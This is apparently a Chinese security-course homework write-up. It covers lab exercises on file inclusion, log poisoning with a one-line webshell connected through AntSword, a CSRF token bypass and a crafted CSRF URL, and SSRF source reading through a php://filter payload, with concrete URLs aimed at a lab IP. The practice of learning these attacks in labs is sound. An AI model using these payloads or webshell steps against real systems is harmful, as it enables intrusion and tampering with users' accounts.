网络安全C10-2024.11.2
作业:
1、文件包含
(1)DVWA环境下去包含其他目录的任意3个文件,要求使用相对路径
1.包含passwd
2.包含index.php
3.包含hosts
(2)远程文件包含
首先在upload-labs的第一关上传info.php,然后把图片网址放在page后面
(3)中间件日志包含绕过,要求使用蚁剑连接成功
首先对日志文件和目录增加权限,让WEB端有权去访问
抓包修改
访问
使用yijian
上传一句话木马,抓包修改,在yijian里输入cookie,通过yijian连接成功
2、CSRF
(1)DVWA-High等级
抓包,删除token,把high改成low
PHPSESSID=cd6av4f5qaiepr24rnq4gtebm5;security=high
(2)使用Burp生成CSRF利用POC并实现攻击
修改个人信息
抓包,复制行头
GET/vul/csrf/csrfget/csrf_get_edit.php?sex=111&phonenum=22233&add=33&email=33&submit=submitHTTP/1.1
修改电话与地址
http://111.231.53.36:8084/vul/csrf/csrfget/csrf_get_edit.php?sex=111&phonenum=555555&add=33&email=55555&submit=submit
然后添加补全URL地址,发送给被攻击者kobe ,修改成功
3、SSRF:file_get_content实验,要求获取ssrf.php的源码
构造url
http://111.231.53.36:8084/vul/ssrf/ssrf_fgc.php?file=php://filter/resource=ssrf.php
4、文件包含、目录遍历和SSRF有什么区别?
文件包含是可以把文件的内容显示出来,目录遍历是可以通过特殊的路径跳到不该去的目录,SSRF是让服务器去访问不该访问的资源。
